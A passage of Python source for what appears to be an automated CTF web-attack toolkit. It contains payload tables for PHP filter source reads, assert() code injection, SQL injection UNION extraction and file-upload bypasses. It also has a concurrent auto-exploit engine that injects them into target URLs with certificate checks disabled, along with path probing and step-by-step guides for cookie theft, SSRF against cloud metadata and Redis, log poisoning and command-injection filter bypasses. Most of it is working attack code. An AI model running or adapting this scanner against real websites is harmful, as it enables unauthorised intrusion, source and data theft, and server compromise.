        {"name": "PHP filter读源码", "payload": "php://filter/convert.base64-encode/resource=index.php", "method": "replace", "detect": "content", "match": ["PD9waHA=", "\u003C?php"], "tip": "php://filter base64编码读PHP源码"},
        {"name": "MD5魔法哈希", "payload": "QNKCDZO", "method": "replace", "detect": "content", "match": [], "tip": "MD5 0e前缀魔法哈希绕过==比较"},
        {"name": "数组混淆", "payload": "a[]=1", "method": "replace", "detect": "content", "match": [], "tip": "数组参数绕过 strcmp/md5 比较"},
        {"name": "assert代码注入", "payload": "\u0027.system(\u0027id\u0027).\u0027", "method": "append", "detect": "content", "match": ["uid=", "gid="], "tip": "PHP assert() 代码注入"},
    ],
    "Upload": [
        {"name": "扩展名绕过php3", "payload": "shell.php3", "method": "replace", "detect": "content", "match": [], "tip": "php3 扩展名绕过黑名单"},
        {"name": "大小写绕过", "payload": "shell.pHp", "method": "replace", "detect": "content", "match": [], "tip": "大小写混合绕过过滤"},
        {"name": "双扩展名", "payload": "shell.php.jpg", "method": "replace", "detect": "content", "match": [], "tip": "双扩展名可能解析为PHP"},
        {"name": "htaccess上传", "payload": ".htaccess", "method": "replace", "detect": "content", "match": [], "tip": "上传.htaccess覆盖配置"},
    ],
}

# ============================================================================
#  HTTP Engine
# ============================================================================

_SSL_CONTEXT = ssl.create_default_context()
_SSL_CONTEXT.check_hostname = False
_SSL_CONTEXT.verify_mode = ssl.CERT_NONE

DEFAULT_HEADERS = {
    "User-Agent": "Mozilla/5.0 Yang-Web/2.1 CTF-Toolkit",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
}

DEFAULT_TIMEOUT = 5  # 短超时，auto_exploit 会跑很多请求


def send_request(url: str, timeout: int = DEFAULT_TIMEOUT, method: str = "GET",
                 post_data: bytes = None) -> Dict:
    """Send HTTP request and return structured response.

    Args:
        url: Target URL
        timeout: Request timeout in seconds
        method: HTTP method (GET or POST)
        post_data: POST body bytes (Content-Type: application/x-www-form-urlencoded)

    Returns:
        {"ok": bool, "url": str, "status": int, "headers": dict,
         "body": str (first 5000 chars), "body_len": int,
         "elapsed_ms": int, "error": str or None}
    """
    result = {
        "ok": False, "url": url, "status": 0, "headers": {},
        "body": "", "body_len": 0, "elapsed_ms": 0, "error": None,
    }
    try:
        headers = dict(DEFAULT_HEADERS)
        if post_data:
            headers["Content-Type"] = "application/x-www-form-urlencoded"
        req = Request(url, data=post_data, headers=headers, method=method)
        start = time.time()
        resp = urlopen(req, timeout=timeout, context=_SSL_CONTEXT)
        elapsed = int((time.time() - start) * 1000)
        body = resp.read()
        charset = "utf-8"
        ct = resp.headers.get("Content-Type", "")
        if "charset=" in ct:
            try:
                charset = ct.split("charset=")[-1].split(";")[0].strip()
            except Exception:
                pass
        try:
            body_str = body.decode(charset, errors="replace")
        except Exception:
            body_str = body.decode("utf-8", errors="replace")
        result.update({
            "ok": True, "status": resp.status,
            "headers": dict(resp.headers),
            "body": body_str[:5000], "body_len": len(body),
            "elapsed_ms": elapsed,
        })
    except HTTPError as e:
        result["status"] = e.code
        result["headers"] = dict(e.headers)
        try:
            body = e.read()
            result["body"] = body.decode("utf-8", errors="replace")[:5000]
            result["body_len"] = len(body)
        except Exception:
            pass
        result["ok"] = True
        result["error"] = f"HTTP {e.code}"
    except URLError as e:
        result["error"] = f"Connection error: {e.reason}"
    except socket.timeout:
        result["error"] = "Request timed out"
    except Exception as e:
        result["error"] = str(e)
    return result


def inject_payload(url: str, param: str, payload: str,
                   method: str = "append") -> str:
    """Inject a payload into a URL query parameter.

    Args:
        url: Base URL
        param: Target parameter name
        payload: Payload value to inject
        method: "append" (add to existing value) or "replace" (overwrite)

    Returns:
        Modified URL with injected payload
    """
    from urllib.parse import quote
    parsed = urlparse(url)
    params = parse_qs(parsed.query, keep_blank_values=True)
    payload_enc = quote(payload, safe='')
    if param not in params:
        new_query = parsed.query
        if new_query:
            new_query += "&"
        new_query += f"{param}={payload_enc}"
    else:
        new_params = {}
        for pname, pvalues in params.items():
            if pname == param:
                if method == "append":
                    new_params[pname] = [pvalues[0] + payload]
                else:
                    new_params[pname] = [payload]
            else:
                new_params[pname] = pvalues
        new_query = urlencode(new_params, doseq=True)
    return urlunparse((
        parsed.scheme, parsed.netloc, parsed.path,
        parsed.params, new_query, parsed.fragment
    ))


def analyze_response(body: str, detect_rule: Dict) -> Dict:
    """Analyze HTTP response body according to detection rules.

    detect_rule fields:
        "detect": "error" | "success" | "content" | "timeout" | "normal"
        "match": list of keyword strings to search for

    Returns:
        {"success": bool, "confidence": str, "detail": str}
    """
    rule_type = detect_rule.get("detect", "normal")
    match_words = detect_rule.get("match", [])
    result = {"success": False, "confidence": "", "detail": ""}

    SQL_ERRORS = [
        "You have an error in your SQL syntax",
        "Warning: mysql",
        "Unclosed quotation mark",
        "Microsoft OLE DB",
        "ODBC Driver",
        "SQLite3::",
        "PostgreSQL",
        "pg_query",
        "ORA-",
        "PLS-",
        "JDBC",
        "Unknown column",
        "Column not found",
        "doesn\u0027t exist",
        "no such table",
        "Division by zero",
        "supplied argument",
        "Call to a member function",
        "on a non-object",
        "Undefined index",
        "Undefined variable",
        "Fatal error",
        "Parse error",
        "syntax error",
        "Stack trace:",
        "Traceback (most recent call last)",
        "Warning:",
        "Notice:",
        "Error:",
        "XPATH syntax error",
        "updatexml",
        "near \"",
        "SqlException",
        "SqlCommand",
        "mysql_fetch",
        "mysql_num_rows",
        "mysql_error",
        "mysqli_error",
        "pg_exec",
        "odbc_exec",
        "mssql_query",
        "Incorrect syntax near",
    ]

    if rule_type == "error":
        for kw in SQL_ERRORS:
            if kw in body:
                result["success"] = True
                result["confidence"] = "High"
                result["detail"] = (
                    f"Error keyword detected: {kw[:60]} "
                    "- Possible SQL or application error leak"
                )
                return result
        result["detail"] = (
            "No known SQL error patterns found "
            "(vuln may still exist, try other methods)"
        )
    elif rule_type == "success":
        if body.strip():
            result["success"] = True
            result["confidence"] = "Medium"
            result["detail"] = "Response body non-empty, attack may have succeeded"
        else:
            result["detail"] = "Response body empty"
    elif rule_type == "content":
        if not match_words:
            result["detail"] = "No match keywords, assuming neutral"
            result["success"] = True
        else:
            found = [w for w in match_words if w in body]
            if found:
                result["success"] = True
                result["confidence"] = "Very High"
                result["detail"] = (
                    f"Match found: {found[:3]} - Payload reflected in response"
                )
            else:
                result["detail"] = f"No match for: {match_words[:3]}"
    elif rule_type == "timeout":
        result["detail"] = "Timeout detection (judged externally)"
        result["success"] = True
    elif rule_type == "normal":
        result["detail"] = "Neutral detection, return raw response"
        result["success"] = True
    return result


# ============================================================================
#  Page Crawler
# ============================================================================

def crawl_page(url: str, timeout: int = 8) -> Dict:
    """Fetch and crawl a page, extracting forms, links, and input parameters.

    Returns:
        {"ok": bool, "url": str, "status": int, "page_title": str,
         "forms": [{"action": str, "method": str,
                    "inputs": [{"name": str, "type": str, "value": str}]}],
         "links": [{"url": str, "text": str}],
         "discovered_params": [str],
         "stats": {"forms_count": int, "links_count": int, "params_count": int},
         "error": str or None}
    """
    result = {
        "ok": False, "url": url, "status": 0, "page_title": "",
        "forms": [], "links": [], "discovered_params": [],
        "stats": {"forms_count": 0, "links_count": 0, "params_count": 0},
        "error": None,
    }
    try:
        resp = send_request(url, timeout=timeout)
        if not resp["ok"]:
            result["error"] = resp.get("error", "Request failed")
            return result
        body = resp["body"]
        result["ok"] = True
        result["url"] = resp["url"]
        result["status"] = resp["status"]
        result["page_title"] = _extract_title(body)
        result["forms"] = _extract_forms(body, url)
        result["links"] = _extract_links_with_params(body, url)[:20]
        all_params = set()
        for form in result["forms"]:
            for inp in form.get("inputs", []):
                name = inp.get("name", "").strip()
                if name:
                    all_params.add(name)
        for link in result["links"]:
            p = urlparse(link["url"])
            if p.query:
                for pn in parse_qs(p.query, keep_blank_values=True):
                    all_params.add(pn)
        result["discovered_params"] = sorted(all_params)

        # ★ 扫描PHP源码中的 $_GET / $_POST / $_REQUEST 参数
        # 先去掉HTML标签（因为highlight_file会把源码加span）
        clean_body = re.sub(r'<[^>]+>', '', body)
        php_params = set()
        for pattern in [r'\$_GET\[["\'](\w+)["\']',
                        r'\$_POST\[["\'](\w+)["\']',
                        r'\$_REQUEST\[["\'](\w+)["\']',
                        r'\$_GET\[(\$\w+)\]']:
            for m in re.finditer(pattern, clean_body):
                php_params.add(m.group(1))
        if php_params:
            all_params.update(php_params)
            result["discovered_params"] = sorted(all_params)
        result["stats"] = {
            "forms_count": len(result["forms"]),
            "links_count": len(result["links"]),
            "params_count": len(result["discovered_params"]),
        }
    except Exception as e:
        result["error"] = str(e)
    return result


def _extract_title(html: str) -> str:
    """Extract page title from HTML."""
    m = re.search(r"<title[^>]*>(.*?)</title>", html, re.IGNORECASE | re.DOTALL)
    return m.group(1).strip() if m else ""


def _extract_forms(html: str, base_url: str) -> List[Dict]:
    """Extract all forms from HTML page."""
    forms = []
    fm_pat = re.compile(r"<form\b([^>]*?)>(.*?)</form>", re.IGNORECASE | re.DOTALL)
    for fm in fm_pat.finditer(html):
        attrs = fm.group(1)
        body = fm.group(2)
        action = _get_attr(attrs, "action") or base_url
        method = (_get_attr(attrs, "method") or "GET").upper()
        if not action.startswith(("http://", "https://")):
            pb = urlparse(base_url)
            if action.startswith("/"):
                action = f"{pb.scheme}://{pb.netloc}{action}"
            else:
                bp = pb.path.rsplit("/", 1)[0] if "/" in pb.path else ""
                action = f"{pb.scheme}://{pb.netloc}{bp}/{action}"
        inputs = []
        ip = re.compile(r"<(?:input|textarea|select|button)\b([^>]*?)(?:/?>)", re.IGNORECASE)
        for im in ip.finditer(body):
            ia = im.group(1)
            name = _get_attr(ia, "name")
            itype = _get_attr(ia, "type") or "text"
            val = _get_attr(ia, "value") or ""
            if name and itype.lower() not in ("submit", "button", "reset", "image"):
                inputs.append({"name": name, "type": itype.lower(), "value": val})
        hp = re.compile(r"<input\b([^>]*?type\s*=\s*[\"\u0027]hidden[\"\u0027][^>]*?)(?:/?>)", re.IGNORECASE)
        for hm in hp.finditer(body):
            ha = hm.group(1)
            name = _get_attr(ha, "name")
            val = _get_attr(ha, "value") or ""
            if name and not any(i["name"] == name for i in inputs):
                inputs.append({"name": name, "type": "hidden", "value": val})
        if inputs:
            forms.append({"action": action, "method": method, "inputs": inputs})
    return forms


def _extract_links_with_params(html: str, base_url: str) -> List[Dict]:
    """Extract links that contain query parameters from HTML."""
    links = []
    lp = re.compile(r"<a\b[^>]*?href=[\"\u0027](.*?)[\"\u0027]", re.IGNORECASE)
    seen = set()
    for m in lp.finditer(html):
        href = m.group(1)
        if "?" not in href:
            continue
        tm = re.search(r"<a\b[^>]*?>(.*?)</a>", html[m.start():m.start() + 500],
                       re.IGNORECASE | re.DOTALL)
        lt = re.sub(r"<[^>]+>", "", tm.group(1)).strip() if tm else ""
        if not href.startswith(("http://", "https://")):
            pb = urlparse(base_url)
            if href.startswith("/"):
                href = f"{pb.scheme}://{pb.netloc}{href}"
            else:
                bp = pb.path.rsplit("/", 1)[0] if "/" in pb.path else ""
                href = f"{pb.scheme}://{pb.netloc}{bp}/{href}"
        if href not in seen:
            seen.add(href)
            links.append({"url": href, "text": lt[:60]})
    return links[:20]


def _get_attr(attrs_str: str, name: str) -> str:
    """Extract attribute value from HTML attribute string."""
    m = re.search(rf"{name}\s*=\s*[\"\u0027]([^\"\u0027]*?)[\"\u0027]",
                  attrs_str, re.IGNORECASE)
    return m.group(1) if m else ""


# ============================================================================
#  Attack Executor
# ============================================================================

def execute_attack(url: str, param: str, payload_def: Dict,
                   http_method: str = "GET",
                   form_inputs: List[Dict] = None,
                   timeout: int = 0) -> Dict:
    """Execute attack: inject payload, send request, analyze response.

    Args:
        url: Target URL
        param: Parameter name to target
        payload_def: Payload definition with name, payload, method, detect, match, tip
        http_method: GET or POST
        form_inputs: List of form input dicts for POST construction

    Returns:
        {"attack_url": str, "param": str, "payload_name": str,
         "response": dict, "analysis": dict}
    """
    payload = payload_def["payload"]
    method = payload_def.get("method", "append")
    detect = payload_def.get("detect", "normal")
    match_words = payload_def.get("match", [])
    post_data = None
    if http_method == "POST":
        # Build POST body from form_inputs or fallback to simple param=payload
        form_dict = {}
        if form_inputs:
            for inp in form_inputs:
                name = inp.get("name", "")
                val = inp.get("value", "")
                if name == param:
                    if method == "replace":
                        form_dict[name] = payload
                    else:
                        form_dict[name] = val + payload
                else:
                    form_dict[name] = val
        else:
            # Simple POST: just the target param
            form_dict[param] = payload
        post_data = urlencode(form_dict).encode("utf-8")
        attack_url = url
    else:
        attack_url = inject_payload(url, param, payload, method)
    req_timeout = timeout if timeout > 0 else DEFAULT_TIMEOUT
    if detect == "timeout":
        req_timeout = 8
    resp = send_request(attack_url, timeout=req_timeout, method=http_method,
                        post_data=post_data)
    if detect == "timeout":
        elapsed = resp.get("elapsed_ms", 0)
        if elapsed > 2500:
            analysis = {
                "success": True, "confidence": "Very High",
                "detail": f"Response time {elapsed}ms (>2500ms) - Sleep injection confirmed"
            }
        else:
            analysis = {
                "success": False, "confidence": "",
                "detail": f"Response time {elapsed}ms, sleep injection not confirmed"
            }
    else:
        analysis = analyze_response(resp.get("body", ""),
                                    {"detect": detect, "match": match_words})
    return {
        "attack_url": attack_url, "param": param,
        "payload_name": payload_def["name"],
        "response": resp, "analysis": analysis,
    }


# ============================================================================
#  Auto-Exploit Engine — 自动解题引擎
# ============================================================================

FLAG_PATHS = [
    "/flag", "/flag.txt", "/flag.php", "/flag.html",
    "/tmp/flag", "/tmp/flag.txt",
    "/var/www/html/flag", "/var/www/html/flag.php",
    "/home/ctf/flag", "/home/flag",
    "/etc/flag", "/root/flag",
    "flag.txt", "flag.php", "flag",
]

FLAG_RE = re.compile(
    r'(?:flag|ctf|iscc|hctf|ddctf|realworld|n1ctf|suctf|wmctf|geesec|dasctf|sigpwny|cyber|hack|pico|tjctf|angstrom|dctf|ractf|zh3r0|inctf|darkctf|csictf|ritsec|nactf|b01lers|kksctf)'
    r'\{[^}]+\}', re.IGNORECASE
)


def auto_exploit(url, results, on_progress=None, on_found=None, fingerprint=None):
    """v3.0 自动解题 — 并发引擎 + 自适应调度 + 智能提权.

    Uses ConcurrentEngine for parallel attacks and AdaptiveScheduler
    for context-aware payload ordering.

    Args:
        url: Target URL
        results: Analysis results from analyze_url()
        on_progress: Callable(stage, item, status)
        on_found: Callable(flag) — fire-once flag callback
        fingerprint: SmartFingerprinter result dict (optional, for scheduling)

    Returns:
        {"flag": str or None, "vuln_confirmed": [dict],
         "attacks_run": int, "stages": [str], "timing_ms": int}
    """
    t_start = time.time()
    vuln_confirmed = []
    attacks_run = 0
    stages = []

    def _found_once(flag):
        """Ensure on_found is called exactly once."""
        if on_found and not getattr(_found_once, '_called', False):
            _found_once._called = True
            try:
                on_found(flag)
            except Exception:
                pass

    def _emit(stage, item, status):
        if on_progress:
            try:
                on_progress(stage, item, status)
            except Exception:
                pass

    # ── Phase 1: Build adaptive attack plan ──
    _emit('plan', '构建攻击计划', '智能调度中...')

    # Use fingerprint if available, otherwise create a minimal one
    fp = fingerprint or {'php_vulns': [], 'php_params': [], 'waf': None,
                          'cms': 'Unknown', 'cms_confidence': 0,
                          'tech_stack': [], '_url': url}
    if '_url' not in fp:
        fp['_url'] = url

    scheduler = AdaptiveScheduler()
    tasks = scheduler.schedule(results, fp)

    if not tasks:
        _emit('plan', '无攻击目标', '分析未发现可利用漏洞')
        return {'flag': None, 'vuln_confirmed': [], 'attacks_run': 0,
                'stages': ['no_targets'], 'timing_ms': int((time.time() - t_start) * 1000)}

    _emit('plan', f'攻击计划就绪', f'{len(tasks)} 个任务 | 优先: {tasks[0].get("payload_def",{}).get("name","?")}')

    # ── Phase 2: Concurrent attack batch ──
    _emit('attack', '并发攻击启动', f'{len(tasks)} 任务 × {min(15, len(tasks))} 并发')
    stages.append('concurrent_attack')

    engine = ConcurrentEngine(max_workers=15, timeout=5, retries=2)

    # Track results from batch execution
    batch_results, engine_flag = engine.attack_batch(
        tasks,
        on_progress=lambda stage, item, status: _emit(stage, item, status),
        on_flag=lambda f: _found_once(f))

    attacks_run = len(batch_results)

    # Check engine-returned flag first
    if engine_flag:
        _found_once(engine_flag)
        timing = int((time.time() - t_start) * 1000)
        return {
            'flag': engine_flag,
            'flag_found_by': 'concurrent_engine',
            'vuln_confirmed': vuln_confirmed,
            'attacks_run': attacks_run,
            'stages': stages + ['flag_in_batch'],
            'timing_ms': timing,
        }

        # Collect confirmed vulns from batch results
        for res in batch_results:
            analysis = res.get('analysis', {})
            if analysis.get('success'):
                vuln_confirmed.append({
                    'type': res.get('payload_name', '?'),
                    'param': res.get('param', '?'),
                    'payload': res.get('payload_name', '?'),
                    'evidence': analysis.get('detail', '')[:120],
                })

    _emit('attack', f'攻击完成', f'{attacks_run} 次 | 确认 {len(vuln_confirmed)} 漏洞')

    timing = int((time.time() - t_start) * 1000)
    return {
        'flag': None,
        'vuln_confirmed': vuln_confirmed,
        'attacks_run': attacks_run,
        'stages': stages + ['completed'],
        'timing_ms': timing,
    }


# Keep old helper functions for backward compatibility
# (ConcurrentEngine now handles flag paths internally via AdaptiveScheduler)
def _try_flag_paths(url, param, on_progress=None):
    """Deprecated: Use ConcurrentEngine + AdaptiveScheduler instead."""
    # Simplified fallback for old code paths
    for cmd in ['cat /flag', 'cat /fla*', 'cat flag.txt', 'cat /f*']:
        try:
            res = execute_attack(url, param, {
                'name': f'flag:{cmd}', 'payload': cmd,
                'method': 'replace', 'detect': 'content',
                'match': ['flag{', 'CTF{', 'ISCC{'],
            }, timeout=2)
            body = res.get('response', {}).get('body', '')
            flags = FLAG_RE.findall(body)
            if flags:
                if on_progress:
                    on_progress('flag_path', cmd, 'FLAG!')
                return flags[0]
        except Exception:
            pass
    return None


def _try_sqli_extract(url, param, on_progress=None):
    """Deprecated: SQLi extraction, kept for backward compat."""
    for ext in [
        "' UNION SELECT 1,flag,3 FROM flag-- ",
        "' UNION SELECT 1,group_concat(flag),3 FROM flag-- ",
        "' UNION SELECT 1,database(),3-- ",
        "' UNION SELECT 1,load_file('/flag'),3-- ",
    ]:
        try:
            res = execute_attack(url, param, {
                'name': 'sqli_extract', 'payload': ext,
                'method': 'append', 'detect': 'content', 'match': []})
            body = res.get('response', {}).get('body', '')
            flags = FLAG_RE.findall(body)
            if flags:
                return flags[0]
        except Exception:
            pass
    return None


def _try_lfi_flag(url, param, on_progress=None):
    """Deprecated: LFI flag read, kept for backward compat."""
    for path in ['../../../flag', '../../flag', 'flag', 'flag.php', 'flag.txt']:
        try:
            res = execute_attack(url, param, {
                'name': f'LFI {path}', 'payload': path,
                'method': 'replace', 'detect': 'content',
                'match': ['flag{', 'CTF{', 'ISCC{']})
            body = res.get('response', {}).get('body', '')
            flags = FLAG_RE.findall(body)
            if flags:
                return flags[0]
        except Exception:
            pass
    return None


# ============================================================================
#  Main URL Analyzer
# ============================================================================

def analyze_url(url: str) -> Dict:
    """Analyze a URL for vulnerability indicators.

    Pipeline:
        1. Parse URL query params, match against PARAM_SIGNATURES
        2. Match URL path against PATH_PATTERNS
        3. If no params found, crawl page for forms and params
        4. Build evidence, aggregate confidence scores
        5. Optionally scan common paths as fallback

    Returns:
        {"url": str, "parsed": dict, "results": [dict],
         "stats": dict, "crawl": dict or None, "error": str or None}
    """
    TYPE_META = {
        "SQLi":   ("SQL 注入", "\U0001F489"),
        "XSS":    ("跨站脚本", "\U0001F480"),
        "SSTI":   ("模板注入", "\U0001F9E9"),
        "LFI":    ("文件包含", "\U0001F4C2"),
        "SSRF":   ("服务端请求伪造", "\U0001F310"),
        "RCE":    ("远程命令执行", "\U0001F4BB"),
        "Upload": ("文件上传漏洞", "\U0001F4E4"),
        "PHP":    ("PHP 漏洞", "\U0001F418"),
    }
    empty = {
        "url": url, "parsed": {"scheme": "", "host": "", "path": "", "query": ""},
        "results": [],
        "stats": {"url_params_count": 0, "signatures_matched": 0,
                  "path_patterns_matched": 0, "vuln_types_found": 0},
        "crawl": None, "error": None,
    }
    try:
        if not url or not url.strip():
            return {**empty, "error": "Empty URL"}
        if not url.startswith(("http://", "https://")):
            url = "http://" + url
        parsed = urlparse(url)
        host = parsed.hostname or ""
        path = parsed.path or ""
        query = parsed.query or ""
        evidence: Dict[str, Dict] = {}
        sig_count = 0
        fp_result = None
        probe_body = ""
        probe_headers = {}

        # Step 0: Always fetch page for smart source-code fingerprinting
        try:
            probe_resp = send_request(url, timeout=5)
            if probe_resp.get('ok'):
                probe_body = probe_resp.get('body', '')
                probe_headers = dict(probe_resp.get('headers', {}))
                fingerprinter = SmartFingerprinter()
                fp_result = fingerprinter.fingerprint(probe_headers, probe_body, url)
                fp_result['_url'] = url
        except Exception:
            pass

        # Step 1: Query parameters
        if query:
            params = parse_qs(query, keep_blank_values=True)
            for pn, pv in params.items():
                pl = pn.lower()
                pval = unquote(pv[0]) if pv else ""
                if pl in PARAM_SIGNATURES:
                    for vt, cf, rs in PARAM_SIGNATURES[pl]:
                        _add_ev(evidence, vt, cf, rs, pn)
                        sig_count += 1
                else:
                    for sig, matches in PARAM_SIGNATURES.items():
                        if len(sig) > 1 and sig in pl:
                            for vt, cf, rs in matches:
                                _add_ev(evidence, vt, int(cf * 0.7),
                                        f"(partial) {rs}", pn)
                                sig_count += 1
                if re.match(r"^\d+$", pval):
                    _add_ev(evidence, "SQLi", 30,
                            f"Param {pn} has numeric value, likely SQL target", pn)
        # Step 2: Path patterns
        pc = 0
        fpq = path + ("?" + query if query else "")
        for pat, vt, cb, rs in PATH_PATTERNS:
            if re.search(pat, fpq, re.IGNORECASE):
                _add_ev(evidence, vt, cb, rs, "")
                pc += 1
        # Step 3: Fallback for unknown params
        if query and not evidence:
            for pn in parse_qs(query, keep_blank_values=True):
                _add_ev(evidence, "SQLi", 35,
                        f"Unknown param {pn}, possible SQLi vector", pn)
                _add_ev(evidence, "XSS", 30,
                        f"Unknown param {pn}, possible XSS vector", pn)
        # Step 4: Crawl
        cr = None
        if not query and not evidence:
            cr = crawl_page(url)
            if cr.get("ok") and cr.get("discovered_params"):
                for pn in cr["discovered_params"]:
                    pl = pn.lower()
                    if pl in PARAM_SIGNATURES:
                        for vt, cf, rs in PARAM_SIGNATURES[pl]:
                            _add_ev(evidence, vt, cf, f"(crawled) {rs}", pn)
                    else:
                        matched = False
                        for sig, matches in PARAM_SIGNATURES.items():
                            if len(sig) > 1 and sig in pl:
                                for vt, cf, rs in matches:
                                    _add_ev(evidence, vt, int(cf * 0.7),
                                            f"(crawled) {rs}", pn)
                                matched = True
                        if not matched:
                            _add_ev(evidence, "SQLi", 30,
                                    f"(crawled) Unknown param {pn}", pn)
                            _add_ev(evidence, "XSS", 25,
                                    f"(crawled) Unknown param {pn}", pn)
            elif cr.get("ok"):
                ps = []
                cps = [
                    "/login.php", "/login", "/admin", "/admin.php",
                    "/index.php", "/flag", "/flag.php", "/robots.txt",
                    "/api", "/search.php", "/upload", "/upload.php",
                    "/download.php", "/view.php", "/news.php", "/user.php",
                    "/register.php", "/signup", "/source", "/www.zip",
                    "/.git/HEAD", "/phpinfo.php", "/debug", "/backup",
                ]
                bn = url.rstrip("/")
                for tp in cps:
                    tu = bn + tp
                    try:
                        rp = send_request(tu, timeout=3)
                        if rp["ok"] and rp["status"] not in (404, 403, 500):
                            ps.append({
                                "path": tp, "status": rp["status"],
                                "len": rp["body_len"],
                                "title": _extract_title(rp["body"])[:40],
                            })
                    except Exception:
                        pass
                if ps:
                    cr["paths_found"] = ps

        # Step 5: Source-level fingerprinting — boost confidence from code analysis
        if fp_result:
            for pv in fp_result.get('php_vulns', []):
                vt_type = pv['type']
                cf = pv['confidence']
                reason = f"(源码) {pv['reason']}: {pv['evidence'][:60]}"
                # Use fingerprint params as parameter names
                for pp in fp_result.get('php_params', []):
                    _add_ev(evidence, vt_type, cf, reason, pp['name'])
                if not fp_result.get('php_params'):
                    _add_ev(evidence, vt_type, cf, reason, '')
            # Boost based on CMS context
            cms = fp_result.get('cms', 'Unknown')
            tech_stack = fp_result.get('tech_stack', [])
            if cms != 'Unknown' and fp_result.get('cms_confidence', 0) >= 50:
                for tv in tech_stack[:2]:
                    # Give moderate boost to CMS-relevant vuln types
                    _add_ev(evidence, tv, 25, f"(CMS) {cms} 常见漏洞", '')
            # WAF detection doesn't prevent vulns, but reduces payload confidence later
            if fp_result.get('waf'):
                _add_ev(evidence, 'PHP', 15, f"(WAF) 检测到: {fp_result['waf']}", '')

        # Build results
        results = []
        for vt, info in sorted(evidence.items(), key=lambda x: -x[1]["confidence"]):
            meta = TYPE_META.get(vt, (vt, "?"))
            pls = ATTACK_PAYLOADS.get(vt, [])
            results.append({
                "type": vt, "type_cn": meta[0], "emoji": meta[1],
                "confidence": min(info["confidence"], 100),
                "reasons": info["reasons"], "params": list(info["params"]),
                "payloads": pls,
            })
        return {
            "url": url,
            "parsed": {"scheme": parsed.scheme, "host": host,
                       "path": path, "query": query},
            "results": results,
            "stats": {
                "url_params_count": len(parse_qs(query, keep_blank_values=True)) if query else 0,
                "signatures_matched": sig_count,
                "path_patterns_matched": pc,
                "vuln_types_found": len(results),
            },
            "crawl": cr if (cr and cr.get("ok")) else None,
            "fingerprint": fp_result,
            "error": None,
        }
    except Exception as ex:
        try:
            sc, ho, pa, qu = parsed.scheme, host, path, query
        except Exception:
            sc = ho = pa = qu = ""
        return {
            "url": url,
            "parsed": {"scheme": sc, "host": ho, "path": pa, "query": qu},
            "results": [],
            "stats": {"url_params_count": 0, "signatures_matched": 0,
                      "path_patterns_matched": 0, "vuln_types_found": 0},
            "crawl": None, "error": str(ex),
        }


def _add_ev(evidence, vt, cf, rs, pn):
    """Add vulnerability evidence to the evidence dict."""
    if vt not in evidence:
        evidence[vt] = {"confidence": 0, "reasons": [], "params": set()}
    evidence[vt]["confidence"] += cf
    if rs not in evidence[vt]["reasons"]:
        evidence[vt]["reasons"].append(rs)
    if pn:
        evidence[vt]["params"].add(pn)


# ============================================================================
#  Attack Guides
# ============================================================================

def get_attack_guide(vuln_type: str) -> str:
    """Return a multi-line attack guide for a given vulnerability type.

    Args:
        vuln_type: SQLi, XSS, SSTI, LFI, SSRF, RCE, Upload, or PHP

    Returns:
        Multi-line string with attack methodology guide
    """
    guides = {
        "SQLi": (
            "=== SQL Injection Attack Guide ===\n"
            "\n"
            "1. [DETECT] Add single quote to trigger SQL error\n"
            "2. [CONFIRM] AND 1=1 / AND 1=2 comparison to confirm injection\n"
            "3. [COLUMNS] ORDER BY n probe to find column count\n"
            "4. [EXTRACT] UNION SELECT 1,2,3... to find visible columns\n"
            "5. [DUMP] database() then tables then columns then data\n"
            "\n"
            "Tips: Use error-based (updatexml/extractvalue) when UNION blocked.\n"
            "For blind SQLi, use sleep() or benchmark() for time-based detection."
        ),
        "XSS": (
            "=== Cross-site Scripting Attack Guide ===\n"
            "\n"
            "1. [PROBE] Test script tag - check if reflected\n"
            "2. [BYPASS] Use img onerror to bypass tag filters\n"
            "3. [BYPASS] SVG onload for alternative XSS vector\n"
            "4. [EXPLOIT] Cookie stealer payload to exfiltrate data\n"
            "\n"
            "Tips: In CTF, XSS is often used to steal admin cookies.\n"
            "Set up a simple HTTP listener: python3 -m http.server 8888"
        ),
        "SSTI": (
            "=== Server-Side Template Injection Guide ===\n"
            "\n"
            "1. [DETECT] {{7*7}} returns 49 = Jinja2/Twig SSTI\n"
            "2. [DETECT] ${7*7} returns 49 = Freemarker/Mako SSTI\n"
            "3. [IDENTIFY] Test syntax: {{}}, ${}, <%= %>, {php}{/php}\n"
            "4. [RCE] Use framework-specific RCE payloads\n"
            "5. [FLAG] Search and read: cat /flag or /flag.txt\n"
            "\n"
            "Tips: Jinja2 RCE is the most common in CTF.\n"
            "Try cycler.__init__.__globals__ access chain."
        ),
        "LFI": (
            "=== Local File Inclusion Attack Guide ===\n"
            "\n"
            "1. [BASIC] ../../../etc/passwd to confirm path traversal\n"
            "2. [BYPASS] URL-encoded: ..%2f..%2f..%2fetc/passwd\n"
            "3. [SOURCE] php://filter/convert.base64-encode/resource=flag.php\n"
            "4. [RCE] Log poisoning: inject PHP into access.log\n"
            "5. [RCE] php://input with POST body for RCE\n"
            "\n"
            "Tips: PHP filter chain is the go-to for CTF LFI.\n"
            "Combine with /proc/self/environ for environment leaks."
        ),
        "SSRF": (
            "=== Server-Side Request Forgery Guide ===\n"
            "\n"
            "1. [PROBE] http://127.0.0.1:22 to check SSH banner\n"
            "2. [FILE] file:///etc/passwd to read local files\n"
            "3. [CLOUD] http://169.254.169.254/ for AWS/GCP metadata\n"
            "4. [REDIS] gopher://127.0.0.1:6379 for CRLF injection\n"
            "5. [INTERNAL] Scan 192.168.x.x / 10.x.x.x for services\n"
            "\n"
            "Tips: CTF often combines file:// and gopher:// for full exploitation.\n"
            "Use a VPS to receive outbound connections for blind SSRF."
        ),
        "RCE": (
            "=== Remote Code Execution Attack Guide ===\n"
            "\n"
            "1. [COMMAND] ;id to check for uid= response\n"
            "2. [CHAINS] Try ; | || && %0a as separators\n"
            "3. [BYPASS] Space becomes ${IFS}, cat becomes ca\u0027t\n"
            "4. [FIND] ;find / -name flag* to locate flag file\n"
            "5. [READ] ;cat /flag to get the flag\n"
            "\n"
            "Tips: %0a (newline) often bypasses space/separator filters.\n"
            "Use $(cmd) or backtick substitution when ; is blocked."
        ),
        "Upload": (
            "=== File Upload Vulnerability Guide ===\n"
            "\n"
            "1. [PROBE] Upload a legitimate image and check response\n"
            "2. [BYPASS] Try extensions: .php3, .php4, .php5, .phtml\n"
            "3. [BYPASS] Case: .pHp, .PhP to bypass case-sensitive filters\n"
            "4. [BYPASS] Double: shell.php.jpg, shell.php%00.jpg\n"
